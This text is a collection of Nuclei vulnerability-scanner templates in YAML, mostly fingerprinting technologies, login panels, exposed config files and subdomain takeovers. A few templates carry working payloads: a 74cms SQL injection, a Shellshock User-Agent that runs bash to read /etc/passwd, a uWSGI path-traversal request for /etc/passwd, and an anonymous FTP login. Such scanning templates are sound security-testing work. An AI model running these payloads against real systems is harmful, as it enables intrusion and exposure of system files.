| - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "There isn't a GitHub Pages site here." 19 | - "For root URLs (like http://example.com/) you must provide an index.html file" -------------------------------------------------------------------------------- /takeovers/tumblr-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: tumblr-takeover 2 | 3 | info: 4 | name: tumblr takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Whatever you were looking for doesn't currently exist at this address. 19 | - There's nothing here. 20 | condition: and -------------------------------------------------------------------------------- /technologies/artica-web-proxy-detect.yaml: -------------------------------------------------------------------------------- 1 | id: artica-web-proxy-detect 2 | 3 | info: 4 | name: Artica Web Proxy Detect 5 | author: dwisiswant0 6 | severity: info 7 | tags: tech,artica,proxy 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/fw.login.php" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Welcome to the Artica Web Administration Interface" 19 | 20 | - type: status 21 | status: 22 | - 200 -------------------------------------------------------------------------------- /technologies/fanruanoa-detect.yaml: -------------------------------------------------------------------------------- 1 | id: fanruanoa-detect 2 | 3 | info: 4 | name: FanRuanOA-detect 5 | author: YanYun 6 | severity: info 7 | tags: oa,tech,dotnet,fanruan 8 | 9 | requests: 10 | - method: GET 11 | 12 | path: 13 | - "{{BaseURL}}/WebReport/ReportServer" 14 | - "{{BaseURL}}/ReportServer" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - 'DeploySuccess._init' -------------------------------------------------------------------------------- /technologies/herokuapp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: herokuapp-detect 2 | 3 | info: 4 | name: Detect websites using Herokuapp endpoints 5 | author: alifathi-h1 6 | severity: info 7 | tags: heroku,tech 8 | description: Detected endpoints might be vulnerable to subdomain takeover or disclose sensitive info 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | extractors: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "[a-z0-9.-]+\\.herokuapp\\.com" 20 | -------------------------------------------------------------------------------- /technologies/jaspersoft-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jaspersoft-detect 2 | 3 | info: 4 | name: Jaspersoft detected 5 | author: koti2 6 | severity: info 7 | tags: tech,jaspersoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/jasperserver/login.html?error=1" 13 | matchers: 14 | - type: word 15 | words: 16 | - "TIBCO Jaspersoft: Login" 17 | - "Could not login to JasperReports Server" 18 | - "About TIBCO JasperReports Server" 19 | condition: or 20 | -------------------------------------------------------------------------------- /technologies/jitsi-meet.yaml: -------------------------------------------------------------------------------- 1 | id: jitsi-meet 2 | 3 | info: 4 | name: Jitsi Meet Page 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.shodan.io/search?query=http.title%3A%22Jitsi+Meet%22 8 | tags: tech 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Jitsi Meet" 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /technologies/magmi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: magmi-detect 2 | 3 | info: 4 | name: MAGMI (Magento Mass Importer) Plugin Detect 5 | author: dwisiswant0 6 | severity: info 7 | tags: magento,magmi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/magmi/web/js/magmi_utils.js" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "magmi_multifield" 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /technologies/thinkcmf-detection.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-detection 2 | 3 | info: 4 | name: ThinkCMF Detection 5 | author: pikpikcu 6 | severity: info 7 | tags: thinkcmf 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "X-Powered-By: ThinkCMF" 20 | part: header 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /vulnerabilities/jenkins/unaunthenticated-jenkin.yaml: -------------------------------------------------------------------------------- 1 | id: unaunthenticated-jenkin 2 | 3 | info: 4 | name: Unauthenticated Jenkins Dashboard 5 | author: dhiyaneshDK 6 | severity: high 7 | tags: jenkins 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Dashboard [Jenkins] 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /vulnerabilities/other/74cms-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: 74cms-sqli 2 | info: 3 | author: princechaddha 4 | name: 74cms Sql Injection 5 | severity: high 6 | tags: 74cms,sqli 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "e807f1fcf82d132f9bb018ca6738a19f" 17 | part: body 18 | -------------------------------------------------------------------------------- /workflows/worksite-takeover-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: worksite-takeover-workflow 2 | 3 | info: 4 | name: Worksite Takeover Workflow 5 | author: pdteam 6 | description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover. 7 | reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites 8 | 9 | workflows: 10 | - template: dns/worksites-detection.yaml 11 | subtemplates: 12 | - template: takeovers/worksites-takeover.yaml 13 | -------------------------------------------------------------------------------- /.nuclei-ignore: -------------------------------------------------------------------------------- 1 | # ==| Nuclei Templates Ignore list |== 2 | # ==================================== 3 | # 4 | # This is default list of tags and files to excluded from default nuclei scan. 5 | # More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion 6 | 7 | # tags is a list of tags to ignore execution for 8 | # unless asked for by the user. 9 | 10 | tags: 11 | - "fuzz" 12 | - "dos" 13 | - "misc" 14 | 15 | # files is a list of files to ignore template execution 16 | # unless asked for by the user. -------------------------------------------------------------------------------- /exposures/files/keycloak-json.yaml: -------------------------------------------------------------------------------- 1 | id: keycloak-json 2 | info: 3 | name: Keycloak Json File 4 | author: oppsec 5 | severity: info 6 | tags: exposure 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/keycloak.json" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - realm 18 | - resource 19 | - auth-server-url 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /iot/liveview-axis-camera.yaml: -------------------------------------------------------------------------------- 1 | id: liveview-axis-camera 2 | 3 | info: 4 | name: Live view AXIS Network Camera 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6843 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/view/viewer_index.shtml' 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Live view - AXIS' 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /misconfiguration/cgi-test-page.yaml: -------------------------------------------------------------------------------- 1 | id: cgi-test-page 2 | info: 3 | name: CGI Test page 4 | author: YASH ANAND @yashanand155 5 | severity: info 6 | tags: cgi 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/cgi-bin/test/test.cgi" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - HTTP_ACCEPT 18 | - HTTP_ACCEPT_ENCODING 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /network/ftp-default-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: ftp-default-credentials 2 | 3 | info: 4 | name: FTP Service with anonymous Login 5 | author: pussycat0x 6 | severity: info 7 | tags: network,ftp,default-login 8 | 9 | network: 10 | 11 | - inputs: 12 | - data: "USER anonymous\r\nPASS anonymous\r\n" 13 | host: 14 | - "{{Hostname}}:21" 15 | - "{{Hostname}}" 16 | 17 | matchers: 18 | - type: word 19 | words: 20 | - "230" 21 | - "Anonymous user logged in" 22 | condition: and -------------------------------------------------------------------------------- /network/vnc-detect.yaml: -------------------------------------------------------------------------------- 1 | id: vnc-service-detection 2 | info: 3 | name: VNC Service Detection 4 | author: pussycat0x 5 | severity: info 6 | tags: network,vnc 7 | description: VNC service detection 8 | network: 9 | - inputs: 10 | - data: "\r\n" 11 | host: 12 | - "{{Hostname}}:5900" 13 | matchers: 14 | - type: word 15 | words: 16 | - "RFB" 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "RFB ([0-9.]+)" 22 | -------------------------------------------------------------------------------- /takeovers/tictail-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: tictail-takeover 2 | 3 | info: 4 | name: tictail takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Building a brand of your own?' 19 | - 'to target URL:
' 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | group: 1 24 | regex: 25 | - 'target="besite">(.*)
' 26 | -------------------------------------------------------------------------------- /technologies/default-fedora-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-fedora-page 2 | 3 | info: 4 | name: Fedora Default Test Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,fedora 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+HTTP+Server+on+Fedora%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Test Page for the HTTP Server on Fedora' 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/default-payara-server-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-payara-server-page 2 | 3 | info: 4 | name: Payara Server Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,payara 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Payara+Server+-+Server+Running%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Payara Server - Server Running" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/gespage-detect.yaml: -------------------------------------------------------------------------------- 1 | id: gespage-detect 2 | 3 | info: 4 | name: Gespage Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,gespage 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gespage/webapp/login.xhtml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Login utilisateur Gespage" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/strapi-cms-detect.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-cms-detect 2 | 3 | info: 4 | name: strapi CMS detect 5 | author: cyllective 6 | severity: info 7 | description: Detects strapi CMS 8 | tags: tech,strapi,cms 9 | reference: 10 | - https://github.com/strapi/strapi 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/admin/auth/login" 16 | 17 | matchers: 18 | - type: word 19 | part: body 20 | condition: or 21 | words: 22 | - 'Strapi Admin' -------------------------------------------------------------------------------- /exposed-panels/acunetix-panel.yaml: -------------------------------------------------------------------------------- 1 | id: acunetix-panel-detect 2 | 3 | info: 4 | name: Acunetix Panel detector 5 | author: joanbono 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/#/login" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Acunetix' 19 | - '' 20 | part: body 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /exposed-panels/gitlab-detect.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-detect 2 | 3 | info: 4 | name: Detect Gitlab 5 | author: ehsahil 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/users/sign_in" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'GitLab' 21 | - 'https://about.gitlab.com' 22 | 23 | - type: status 24 | status: 25 | - 200 -------------------------------------------------------------------------------- /exposed-panels/r-webserver-login.yaml: -------------------------------------------------------------------------------- 1 | id: r-webserver-login 2 | info: 3 | name: R WebServer Login 4 | author: pussycat0x 5 | severity: info 6 | reference: https://www.exploit-db.com/ghdb/7132 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "R WebServer" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/siteomat-login.yaml: -------------------------------------------------------------------------------- 1 | id: siteomat-loader 2 | 3 | info: 4 | name: Orpak SiteOmat login portals 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6624 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login.htm' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'SiteOmat Login' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/web-local-craft.yaml: -------------------------------------------------------------------------------- 1 | id: weblocal-craft-login 2 | 3 | info: 4 | name: Web local craft Terminal Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6800 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/home.html' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'WEB Local Craft Terminal' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/whm-login-detect.yaml: -------------------------------------------------------------------------------- 1 | id: whm-login-detect 2 | info: 3 | name: WHM Login Detect 4 | author: pussycat0x 5 | severity: info 6 | reference: https://www.exploit-db.com/ghdb/7128 7 | tags: whm,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "WHM Login" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/xvr-login.yaml: -------------------------------------------------------------------------------- 1 | id: xvr-login 2 | 3 | info: 4 | name: XVR LOGIN 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22 8 | tags: panel,xvr 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login.rsp' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'XVR LOGIN' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /exposures/configs/httpd-config.yaml: -------------------------------------------------------------------------------- 1 | id: httpd-config 2 | 3 | info: 4 | name: Httpd Config file disclosure 5 | author: sheikhrishad 6 | severity: info 7 | tags: config,exposure,httpd 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/httpd.conf" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "LoadModule" 19 | - "# LoadModule" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /exposures/configs/samba-config.yaml: -------------------------------------------------------------------------------- 1 | id: samba-config 2 | 3 | info: 4 | name: Samba config file disclosure 5 | author: sheikhrishad 6 | severity: info 7 | tags: config,exposure,smb 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/smb.conf" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "configuration file" 19 | - "samba" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /technologies/centreon-detect.yaml: -------------------------------------------------------------------------------- 1 | id: centreon-detect 2 | 3 | info: 4 | name: Centreon Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,centreon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/centreon/index.php" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Centreon - IT & Network Monitoring" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/default-apache2-ubuntu-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-apache2-ubuntu-page 2 | 3 | info: 4 | name: Apache2 Ubuntu Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,apache 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Apache2+Ubuntu+Default+Page%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Apache2 Ubuntu Default Page: It works" 18 | part: body 19 | -------------------------------------------------------------------------------- /vulnerabilities/other/rce-shellshock-user-agent.yaml: -------------------------------------------------------------------------------- 1 | id: rce-user-agent-shell-shock 2 | 3 | info: 4 | name: Remote Code Execution Via (User-Agent) 5 | author: 0xelkomy 6 | severity: high 7 | tags: shellshock,rce 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cgi-bin/status" 13 | 14 | headers: 15 | User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" 16 | 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:.*:0:0" 21 | part: body -------------------------------------------------------------------------------- /cves/2018/CVE-2018-7490.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7490 2 | 3 | info: 4 | name: uWSGI PHP Plugin Directory Traversal 5 | author: madrobot 6 | severity: high 7 | tags: cve,cve2018,uwsgi,php,lfi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /exposed-panels/faraday-login.yaml: -------------------------------------------------------------------------------- 1 | id: faraday-login 2 | 3 | info: 4 | name: Faraday Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.shodan.io/search?query=html%3A%22faradayApp%22 8 | tags: panel,faraday 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/#/login' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'ng-app="faradayApp">' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | --------------------------------------------------------------------------------